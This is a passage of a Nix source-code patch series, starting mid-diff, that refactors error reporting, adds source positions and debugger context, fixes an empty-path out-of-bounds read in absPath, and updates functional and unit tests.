} - , status(status) + : err { .level = lvlError, .msg = hintfmt(args...), .status = status } { } template @@ -149,6 +157,15 @@ public: const std::string & msg() const { return calcWhat(); } const ErrorInfo & info() const { calcWhat(); return err; } + void withExitStatus(unsigned int status) + { + err.status = status; + } + + void atPos(std::shared_ptr pos) { + err.pos = pos; + } + void pushTrace(Trace trace) { err.traces.push_front(trace); diff --git a/src/libutil/logging.cc b/src/libutil/logging.cc index d68ddacc0..89fbd194a 100644 --- a/src/libutil/logging.cc +++ b/src/libutil/logging.cc @@ -199,7 +199,7 @@ struct JSONLogger : Logger { json["level"] = ei.level; json["msg"] = oss.str(); json["raw_msg"] = ei.msg.str(); - to_json(json, ei.errPos); + to_json(json, ei.pos); if (loggerSettings.showTrace.get() && !ei.traces.empty()) { nlohmann::json traces = nlohmann::json::array(); diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 40378e123..017818ed5 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -950,8 +950,8 @@ static void opServe(Strings opFlags, Strings opArgs) store->buildPaths(toDerivedPaths(paths)); out << 0; } catch (Error & e) { - assert(e.status); - out << e.status << e.msg(); + assert(e.info().status); + out << e.info().status << e.msg(); } break; } diff --git a/src/nix/eval.cc b/src/nix/eval.cc index a89fa7412..2e0837c8e 100644 --- a/src/nix/eval.cc +++ b/src/nix/eval.cc @@ -104,7 +104,7 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption } } else - throw TypeError("value at '%s' is not a string or an attribute set", state->positions[pos]); + state->error("value at '%s' is not a string or an attribute set", state->positions[pos]).debugThrow(); }; recurse(*v, pos, *writeTo); diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 0e34bd76a..646e4c831 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -848,10 +848,10 @@ struct CmdFlakeInitCommon : virtual Args, EvalCommand auto 
templateDir = templateDirAttr->getString(); if (!store->isInStore(templateDir)) - throw TypeError( + evalState->error( "'%s' was not found in the Nix store\n" "If you've set '%s' to a string, try using a path instead.", - templateDir, templateDirAttr->getAttrPathStr()); + templateDir, templateDirAttr->getAttrPathStr()).debugThrow(); std::vector changedFiles; std::vector conflictedFiles; @@ -1321,7 +1321,7 @@ struct CmdFlakeShow : FlakeCommand, MixJSON { auto aType = visitor.maybeGetAttr("type"); if (!aType || aType->getString() != "app") - throw EvalError("not an app definition"); + state->error("not an app definition").debugThrow(); if (json) { j.emplace("type", "app"); } else { diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh index c6a482035..ea90f8ebe 100644 --- a/tests/functional/fetchGit.sh +++ b/tests/functional/fetchGit.sh @@ -67,7 +67,7 @@ path2=$(nix eval --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \" [[ $(nix eval --raw --expr "builtins.readFile (fetchGit { url = file://$repo; rev = \"$rev2\"; } + \"/hello\")") = world ]] # But without a hash, it fails -expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "'fetchGit' requires a locked input" +expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "fetchGit requires a locked input" # Fetch again. This should be cached. 
mv $repo ${repo}-tmp @@ -208,7 +208,7 @@ path6=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; ur [[ $path3 = $path6 ]] [[ $(nix eval --impure --expr "(builtins.fetchTree { type = \"git\"; url = \"file://$TEST_ROOT/shallow\"; ref = \"dev\"; shallow = true; }).revCount or 123") == 123 ]] -expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "'fetchTree' requires a locked input" +expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "fetchTree requires a locked input" # Explicit ref = "HEAD" should work, and produce the same outPath as without ref path7=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repo\"; ref = \"HEAD\"; }).outPath") diff --git a/tests/functional/lang/eval-fail-attr-name-type.err.exp b/tests/functional/lang/eval-fail-attr-name-type.err.exp index c8d56ba7d..6848a35ed 100644 --- a/tests/functional/lang/eval-fail-attr-name-type.err.exp +++ b/tests/functional/lang/eval-fail-attr-name-type.err.exp @@ -14,3 +14,8 @@ error: 8| error: expected a string but found an integer: 1 + at /pwd/lang/eval-fail-attr-name-type.nix:7:17: + 6| in + 7| attrs.puppy.${key} + | ^ + 8| diff --git a/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp b/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp index 73f9df8cc..9bbb251e1 100644 --- a/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp +++ b/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp @@ -5,4 +5,4 @@ error: | ^ 2| key = "value" - error: while parsing a TOML string: Dates and times are not supported + error: while parsing TOML: Dates and times are not supported diff --git a/tests/functional/lang/eval-fail-toJSON.err.exp b/tests/functional/lang/eval-fail-toJSON.err.exp index 4f6003437..ad267711b 100644 --- a/tests/functional/lang/eval-fail-toJSON.err.exp +++ b/tests/functional/lang/eval-fail-toJSON.err.exp @@ -20,6 +20,11 @@ error: 3| 
true … while evaluating list element at index 3 + at /pwd/lang/eval-fail-toJSON.nix:2:3: + 1| builtins.toJSON { + 2| a.b = [ + | ^ + 3| true … while evaluating attribute 'c' at /pwd/lang/eval-fail-toJSON.nix:7:7: diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp index 94784c651..4326c9650 100644 --- a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp @@ -7,3 +7,8 @@ error: 6| error: expected a string but found a set: { } + at /pwd/lang/eval-fail-using-set-as-attr-name.nix:5:10: + 4| in + 5| attr.${key} + | ^ + 6| diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 5fca79304..d0d7ca79c 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -12,33 +12,33 @@ namespace nix { TEST_F(ErrorTraceTest, TraceBuilder) { ASSERT_THROW( - state.error("Not much").debugThrow(), + state.error("puppy").debugThrow(), EvalError ); ASSERT_THROW( - state.error("Not much").withTrace(noPos, "No more").debugThrow(), + state.error("puppy").withTrace(noPos, "doggy").debugThrow(), EvalError ); ASSERT_THROW( try { try { - state.error("Not much").withTrace(noPos, "No more").debugThrow(); + state.error("puppy").withTrace(noPos, "doggy").debugThrow(); } catch (Error & e) { - e.addTrace(state.positions[noPos], "Something", ""); + e.addTrace(state.positions[noPos], "beans", ""); throw; } } catch (BaseError & e) { ASSERT_EQ(PrintToString(e.info().msg), - PrintToString(hintfmt("Not much"))); + PrintToString(hintfmt("puppy"))); auto trace = e.info().traces.rbegin(); ASSERT_EQ(e.info().traces.size(), 2); ASSERT_EQ(PrintToString(trace->hint), - PrintToString(hintfmt("No more"))); + PrintToString(hintfmt("doggy"))); trace++; ASSERT_EQ(PrintToString(trace->hint), - PrintToString(hintfmt("Something"))); + PrintToString(hintfmt("beans"))); throw; } , EvalError @@ 
-47,12 +47,12 @@ namespace nix { TEST_F(ErrorTraceTest, NestedThrows) { try { - state.error("Not much").withTrace(noPos, "No more").debugThrow(); + state.error("puppy").withTrace(noPos, "doggy").debugThrow(); } catch (BaseError & e) { try { - state.error("Not much more").debugThrow(); + state.error("beans").debugThrow(); } catch (Error & e2) { - e.addTrace(state.positions[noPos], "Something", ""); + e.addTrace(state.positions[noPos], "beans2", ""); //e2.addTrace(state.positions[noPos], "Something", ""); ASSERT_TRUE(e.info().traces.size() == 2); ASSERT_TRUE(e2.info().traces.size() == 0); From 87dc4bc7d139a7eccb257e71558314a0d99e8d6a Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 1 Feb 2024 13:08:06 -0800 Subject: [PATCH 378/654] Attach positions to errors in `derivationStrict` --- src/libexpr/primops.cc | 33 +++++++++++++++++---------------- 1 file changed, 17 insertions(+), 16 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 1eec6f961..69f89e0e0 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1085,9 +1085,10 @@ drvName, Bindings * attrs, Value & v) /* Check whether attributes should be passed as a JSON file. 
*/ using nlohmann::json; std::optional jsonObject; + auto pos = v.determinePos(noPos); auto attr = attrs->find(state.sStructuredAttrs); if (attr != attrs->end() && - state.forceBool(*attr->value, noPos, + state.forceBool(*attr->value, pos, "while evaluating the `__structuredAttrs` " "attribute passed to builtins.derivationStrict")) jsonObject = json::object(); @@ -1096,7 +1097,7 @@ drvName, Bindings * attrs, Value & v) bool ignoreNulls = false; attr = attrs->find(state.sIgnoreNulls); if (attr != attrs->end()) - ignoreNulls = state.forceBool(*attr->value, noPos, "while evaluating the `__ignoreNulls` attribute " "passed to builtins.derivationStrict"); + ignoreNulls = state.forceBool(*attr->value, pos, "while evaluating the `__ignoreNulls` attribute " "passed to builtins.derivationStrict"); /* Build the derivation expression by processing the attributes. */ Derivation drv; @@ -1160,16 +1161,16 @@ drvName, Bindings * attrs, Value & v) const std::string_view context_below(""); if (ignoreNulls) { - state.forceValue(*i->value, noPos); + state.forceValue(*i->value, pos); if (i->value->type() == nNull) continue; } - if (i->name == state.sContentAddressed && state.forceBool(*i->value, noPos, context_below)) { + if (i->name == state.sContentAddressed && state.forceBool(*i->value, pos, context_below)) { contentAddressed = true; experimentalFeatureSettings.require(Xp::CaDerivations); } - else if (i->name == state.sImpure && state.forceBool(*i->value, noPos, context_below)) { + else if (i->name == state.sImpure && state.forceBool(*i->value, pos, context_below)) { isImpure = true; experimentalFeatureSettings.require(Xp::ImpureDerivations); } @@ -1177,9 +1178,9 @@ drvName, Bindings * attrs, Value & v) /* The `args' attribute is special: it supplies the command-line arguments to the builder. 
*/ else if (i->name == state.sArgs) { - state.forceList(*i->value, noPos, context_below); + state.forceList(*i->value, pos, context_below); for (auto elem : i->value->listItems()) { - auto s = state.coerceToString(noPos, *elem, context, + auto s = state.coerceToString(pos, *elem, context, "while evaluating an element of the argument list", true).toOwned(); drv.args.push_back(s); @@ -1194,29 +1195,29 @@ drvName, Bindings * attrs, Value & v) if (i->name == state.sStructuredAttrs) continue; - (*jsonObject)[key] = printValueAsJSON(state, true, *i->value, noPos, context); + (*jsonObject)[key] = printValueAsJSON(state, true, *i->value, pos, context); if (i->name == state.sBuilder) - drv.builder = state.forceString(*i->value, context, noPos, context_below); + drv.builder = state.forceString(*i->value, context, pos, context_below); else if (i->name == state.sSystem) - drv.platform = state.forceStringNoCtx(*i->value, noPos, context_below); + drv.platform = state.forceStringNoCtx(*i->value, pos, context_below); else if (i->name == state.sOutputHash) - outputHash = state.forceStringNoCtx(*i->value, noPos, context_below); + outputHash = state.forceStringNoCtx(*i->value, pos, context_below); else if (i->name == state.sOutputHashAlgo) - outputHashAlgo = state.forceStringNoCtx(*i->value, noPos, context_below); + outputHashAlgo = state.forceStringNoCtx(*i->value, pos, context_below); else if (i->name == state.sOutputHashMode) - handleHashMode(state.forceStringNoCtx(*i->value, noPos, context_below)); + handleHashMode(state.forceStringNoCtx(*i->value, pos, context_below)); else if (i->name == state.sOutputs) { /* Require ‘outputs’ to be a list of strings. 
*/ - state.forceList(*i->value, noPos, context_below); + state.forceList(*i->value, pos, context_below); Strings ss; for (auto elem : i->value->listItems()) - ss.emplace_back(state.forceStringNoCtx(*elem, noPos, context_below)); + ss.emplace_back(state.forceStringNoCtx(*elem, pos, context_below)); handleOutputs(ss); } } else { - auto s = state.coerceToString(noPos, *i->value, context, context_below, true).toOwned(); + auto s = state.coerceToString(pos, *i->value, context, context_below, true).toOwned(); drv.env.emplace(key, s); if (i->name == state.sBuilder) drv.builder = std::move(s); else if (i->name == state.sSystem) drv.platform = std::move(s); From faaccecbc82d98288582bdc8ca96991796561371 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 1 Feb 2024 13:08:19 -0800 Subject: [PATCH 379/654] Remove `EXCEPTION_NEEDS_THROW_SPEC` We're on C++ 20 now, we don't need this --- src/libutil/error.hh | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 9f9302020..4fb822843 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -31,15 +31,6 @@ #include #include -/* Before 4.7, gcc's std::exception uses empty throw() specifiers for - * its (virtual) destructor and what() in c++11 mode, in violation of spec - */ -#ifdef __GNUC__ -#if __GNUC__ < 4 || (__GNUC__ == 4 && __GNUC_MINOR__ < 7) -#define EXCEPTION_NEEDS_THROW_SPEC -#endif -#endif - namespace nix { @@ -147,13 +138,7 @@ public: : err(e) { } -#ifdef EXCEPTION_NEEDS_THROW_SPEC - ~BaseError() throw () { }; - const char * what() const throw () { return calcWhat().c_str(); } -#else const char * what() const noexcept override { return calcWhat().c_str(); } -#endif - const std::string & msg() const { return calcWhat(); } const ErrorInfo & info() const { calcWhat(); return err; } From 05535be03a1526061ea3a3ad25459c032e1f8f8c Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 2 Feb 2024 13:07:08 +0100 Subject: [PATCH 380/654] Fix test --- 
tests/functional/fetchurl.sh | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/tests/functional/fetchurl.sh b/tests/functional/fetchurl.sh index 578f5a34c..5259dd60e 100644 --- a/tests/functional/fetchurl.sh +++ b/tests/functional/fetchurl.sh @@ -80,4 +80,6 @@ test -x $outPath/fetchurl.sh test -L $outPath/symlink # Make sure that *not* passing a outputHash fails. -expectStderr 100 nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation' +expected=100 +if [[ -v NIX_DAEMON_PACKAGE ]]; then expected=1; fi # work around the daemon not returning a 100 status correctly +expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation' From e67458e5b821e0a3a6839f4637eb96ff873f64ed Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 2 Feb 2024 13:22:18 +0100 Subject: [PATCH 381/654] Better test fix --- tests/functional/fetchurl.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/tests/functional/fetchurl.sh b/tests/functional/fetchurl.sh index 5259dd60e..5a05cc5e1 100644 --- a/tests/functional/fetchurl.sh +++ b/tests/functional/fetchurl.sh @@ -80,6 +80,7 @@ test -x $outPath/fetchurl.sh test -L $outPath/symlink # Make sure that *not* passing a outputHash fails. 
+requireDaemonNewerThan "2.20" expected=100 if [[ -v NIX_DAEMON_PACKAGE ]]; then expected=1; fi # work around the daemon not returning a 100 status correctly expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation' From 7d7483cafce258edf405756c0dd42a34afe231b9 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 17:38:46 -0800 Subject: [PATCH 382/654] Print positions in `--debugger`, instead of pointers --- src/libcmd/repl.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index d7d8f9819..d7af15153 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -232,7 +232,7 @@ static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positi : positions[dt.expr.getPos() ? dt.expr.getPos() : noPos]; if (pos) { - out << pos; + out << *pos; if (auto loc = pos->getCodeLines()) { out << "\n"; printCodeLines(out, "", *pos, *loc); From 016db2d10fe00baa3c72ab6b5bbb480371df711f Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 17:49:10 -0800 Subject: [PATCH 383/654] Add position information to `while evaluating the attribute` --- src/libexpr/eval.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..9fee05290 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1384,7 +1384,7 @@ void ExprSelect::eval(EvalState & state, Env & env, Value & v) state, *this, env, - state.positions[pos2], + state.positions[getPos()], "while evaluating the attribute '%1%'", showAttrPath(state, env, attrPath)) : nullptr; From 0127d54d5e86db9039e6322d482d26e66af8bd8a Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 19:14:22 -0800 Subject: [PATCH 384/654] Enter debugger more reliably in 
let expressions and calls --- src/libexpr/eval.cc | 31 ++++++++++++++++++++++++++++--- 1 file changed, 28 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..df40b18b8 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -846,20 +846,20 @@ void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const e.addTrace(positions[pos], hintfmt(s, s2), frame); } +template static std::unique_ptr makeDebugTraceStacker( EvalState & state, Expr & expr, Env & env, std::shared_ptr && pos, - const char * s, - const std::string & s2) + const Args & ... formatArgs) { return std::make_unique(state, DebugTrace { .pos = std::move(pos), .expr = expr, .env = env, - .hint = hintfmt(s, s2), + .hint = hintfmt(formatArgs...), .isError = false }); } @@ -1322,6 +1322,19 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v) for (auto & i : attrs->attrs) env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited ? env : env2); + auto dts = state.debugRepl + ? makeDebugTraceStacker( + state, + *this, + env2, + getPos() + ? std::make_shared(state.positions[getPos()]) + : nullptr, + "while evaluating a '%1%' expression", + "let" + ) + : nullptr; + body->eval(state, env2, v); } @@ -1718,6 +1731,18 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & void ExprCall::eval(EvalState & state, Env & env, Value & v) { + auto dts = state.debugRepl + ? makeDebugTraceStacker( + state, + *this, + env, + getPos() + ? 
std::make_shared(state.positions[getPos()]) + : nullptr, + "while calling a function" + ) + : nullptr; + Value vFun; fun->eval(state, env, vFun); From 36dfac75601b246dc22a6a27ee793dd9ef0b8c0e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 19:31:18 -0800 Subject: [PATCH 385/654] Expose locals from `let` expressions to the debugger --- src/libexpr/eval.cc | 13 +++++++++++++ src/libexpr/nixexpr.cc | 9 +++------ 2 files changed, 16 insertions(+), 6 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..4241dca6a 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1322,6 +1322,19 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v) for (auto & i : attrs->attrs) env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited ? env : env2); + auto dts = state.debugRepl + ? makeDebugTraceStacker( + state, + *this, + env2, + getPos() + ? std::make_shared(state.positions[getPos()]) + : nullptr, + "while evaluating a '%1%' expression", + "let" + ) + : nullptr; + body->eval(state, env2, v); } diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 6fe4ba81b..492e131d0 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -409,9 +409,6 @@ void ExprCall::bindVars(EvalState & es, const std::shared_ptr & void ExprLet::bindVars(EvalState & es, const std::shared_ptr & env) { - if (es.debugRepl) - es.exprEnvs.insert(std::make_pair(this, env)); - auto newEnv = std::make_shared(nullptr, env.get(), attrs->attrs.size()); Displacement displ = 0; @@ -423,6 +420,9 @@ void ExprLet::bindVars(EvalState & es, const std::shared_ptr & for (auto & i : attrs->attrs) i.second.e->bindVars(es, i.second.inherited ? 
env : newEnv); + if (es.debugRepl) + es.exprEnvs.insert(std::make_pair(this, newEnv)); + body->bindVars(es, newEnv); } @@ -447,9 +447,6 @@ void ExprWith::bindVars(EvalState & es, const std::shared_ptr & break; } - if (es.debugRepl) - es.exprEnvs.insert(std::make_pair(this, env)); - attrs->bindVars(es, env); auto newEnv = std::make_shared(this, env.get()); body->bindVars(es, newEnv); From 6414cd259e7f271e0e7141866cbc79da7f589c93 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 19:58:35 -0800 Subject: [PATCH 386/654] Reduce visual clutter in the debugger --- src/libcmd/repl.cc | 15 +++++++++++++-- src/libexpr/eval.cc | 4 +--- 2 files changed, 14 insertions(+), 5 deletions(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index d7d8f9819..5b4d3f9d5 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -243,10 +243,21 @@ static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positi return out; } +static bool isFirstRepl = true; + void NixRepl::mainLoop() { - std::string error = ANSI_RED "error:" ANSI_NORMAL " "; - notice("Welcome to Nix " + nixVersion + ". Type :? for help.\n"); + if (isFirstRepl) { + std::string_view debuggerNotice = ""; + if (state->debugRepl) { + debuggerNotice = " debugger"; + } + notice("Nix %1%%2%\nType :? for help.", nixVersion, debuggerNotice); + } + + if (isFirstRepl) { + isFirstRepl = false; + } loadFiles(); diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..dc2579dfa 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -821,12 +821,10 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & if (error) { - printError("%s\n\n", error->what()); + printError("%s\n", error->what()); if (trylevel > 0 && error->info().level != lvlInfo) printError("This exception occurred in a 'tryEval' call. 
Use " ANSI_GREEN "--ignore-try" ANSI_NORMAL " to skip these.\n"); - - printError(ANSI_BOLD "Starting REPL to allow you to inspect the current state of the evaluator.\n" ANSI_NORMAL); } auto se = getStaticEnv(expr); From ec5cc1026db61d4c43c89ffdd8a71ed62cfb842d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?S=C3=B6ren=20Tempel?= Date: Sun, 4 Feb 2024 00:47:47 +0100 Subject: [PATCH 387/654] absPath: Explicitly check if path is empty before accessing it It is entirely possible for the path to be an empty string and many unit tests actually pass it as an empty string (e.g. both_roundrip or turnsEmptyPathIntoCWD). In this case, without this patch, absPath will perform a one-byte out-of-bounds access. This was discovered while enabling the nix test suite on Alpine where we compile all software with `-D_GLIBCXX_ASSERTIONS=1`, thus resulting in a test failure on Alpine. --- src/libutil/file-system.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index cf8a6d967..9fa1f62df 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -25,7 +25,7 @@ Path absPath(PathView path, std::optional dir, bool resolveSymlinks) { std::string scratch; - if (path[0] != '/') { + if (path.empty() || path[0] != '/') { // In this case we need to call `canonPath` on a newly-created // string. We set `scratch` to that string first, and then set // `path` to `scratch`. This ensures the newly-created string From a7939a6c2aad1bec454996d553148d2ba351586c Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:16:30 -0800 Subject: [PATCH 388/654] Rename `yellowtxt` -> `magentatxt` `yellowtxt` wraps its value with `ANSI_WARNING`, but `ANSI_WARNING` has been equal to `ANSI_MAGENTA` for a long time. Now the name is updated. 
--- src/libstore/build/derivation-goal.cc | 6 +++--- src/libstore/build/local-derivation-goal.cc | 2 +- src/libutil/fmt.hh | 12 +++++------- 3 files changed, 9 insertions(+), 11 deletions(-) diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index 00cbf4228..454c35763 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -708,7 +708,7 @@ void DerivationGoal::tryToBuild() if (!outputLocks.lockPaths(lockFiles, "", false)) { if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for lock on %s", yellowtxt(showPaths(lockFiles)))); + fmt("waiting for lock on %s", magentatxt(showPaths(lockFiles)))); worker.waitForAWhile(shared_from_this()); return; } @@ -762,7 +762,7 @@ void DerivationGoal::tryToBuild() the wake-up timeout expires. */ if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for a machine to build '%s'", yellowtxt(worker.store.printStorePath(drvPath)))); + fmt("waiting for a machine to build '%s'", magentatxt(worker.store.printStorePath(drvPath)))); worker.waitForAWhile(shared_from_this()); outputLocks.unlock(); return; @@ -987,7 +987,7 @@ void DerivationGoal::buildDone() diskFull |= cleanupDecideWhetherDiskFull(); auto msg = fmt("builder for '%s' %s", - yellowtxt(worker.store.printStorePath(drvPath)), + magentatxt(worker.store.printStorePath(drvPath)), statusToString(status)); if (!logger->isVerbose() && !logTail.empty()) { diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 2ba8be7d6..ce8943efe 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -232,7 +232,7 @@ void LocalDerivationGoal::tryLocalBuild() if (!buildUser) { if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for a free build user ID for '%s'", 
yellowtxt(worker.store.printStorePath(drvPath)))); + fmt("waiting for a free build user ID for '%s'", magentatxt(worker.store.printStorePath(drvPath)))); worker.waitForAWhile(shared_from_this()); return; } diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh index ac72e47fb..6430c7707 100644 --- a/src/libutil/fmt.hh +++ b/src/libutil/fmt.hh @@ -63,19 +63,17 @@ inline std::string fmt(const std::string & fs, const Args & ... args) return f.str(); } -// ----------------------------------------------------------------------------- // format function for hints in errors. same as fmt, except templated values -// are always in yellow. - +// are always in magenta. template -struct yellowtxt +struct magentatxt { - yellowtxt(const T &s) : value(s) {} + magentatxt(const T &s) : value(s) {} const T & value; }; template -std::ostream & operator<<(std::ostream & out, const yellowtxt & y) +std::ostream & operator<<(std::ostream & out, const magentatxt & y) { return out << ANSI_WARNING << y.value << ANSI_NORMAL; } @@ -114,7 +112,7 @@ public: template hintformat & operator%(const T & value) { - fmt % yellowtxt(value); + fmt % magentatxt(value); return *this; } From a7927abdc165c0ed6c55565b333fd4fadcdf3417 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:18:42 -0800 Subject: [PATCH 389/654] Catch `Error`, not `BaseError` in `ValuePrinter` `BaseError` includes `Interrupt`. We probably don't want the value printer to tell you you pressed Ctrl-C while it was working. 
--- src/libexpr/print.cc | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 702e4bfe8..e1cb3f0cb 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -255,7 +255,7 @@ private: output << "»"; if (options.ansiColors) output << ANSI_NORMAL; - } catch (BaseError & e) { + } catch (Error & e) { printError_(e); } } @@ -405,7 +405,7 @@ private: output << ANSI_NORMAL; } - void printError_(BaseError & e) + void printError_(Error & e) { if (options.ansiColors) output << ANSI_RED; @@ -422,7 +422,7 @@ private: if (options.force) { try { state.forceValue(v, v.determinePos(noPos)); - } catch (BaseError & e) { + } catch (Error & e) { printError_(e); return; } From c5d525cd8430f31e38128acb3b483cbf17f2f977 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:19:23 -0800 Subject: [PATCH 390/654] Print error messages but not traces MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This makes output of values that include errors much cleaner. Before: ``` nix-repl> { err = builtins.throw "uh oh!"; } { err = «error: … while calling the 'throw' builtin at «string»:1:9: 1| { err = builtins.throw "uh oh!"; } | ^ error: uh oh!»; } ``` After: ``` nix-repl> { err = builtins.throw "uh oh!"; } { err = «error: uh oh!»; } ``` But if the whole expression throws an error, source locations and (if applicable) a stack trace are printed, like you'd expect: ``` nix-repl> builtins.throw "uh oh!" error: … while calling the 'throw' builtin at «string»:1:1: 1| builtins.throw "uh oh!" | ^ error: uh oh! 
``` --- src/libexpr/print.cc | 2 +- tests/unit/libexpr/value/print.cc | 44 +++---------------------------- 2 files changed, 5 insertions(+), 41 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 702e4bfe8..f4b13019e 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -409,7 +409,7 @@ private: { if (options.ansiColors) output << ANSI_RED; - output << "«" << e.msg() << "»"; + output << "«error: " << filterANSIEscapes(e.info().msg.str(), true) << "»"; if (options.ansiColors) output << ANSI_NORMAL; } diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc index c4264a38d..c1de3a6a9 100644 --- a/tests/unit/libexpr/value/print.cc +++ b/tests/unit/libexpr/value/print.cc @@ -460,19 +460,7 @@ TEST_F(ValuePrintingTests, ansiColorsError) test(vError, ANSI_RED - "«" - ANSI_RED - "error:" - ANSI_NORMAL - "\n … while calling the '" - ANSI_MAGENTA - "throw" - ANSI_NORMAL - "' builtin\n\n " - ANSI_RED - "error:" - ANSI_NORMAL - " uh oh!»" 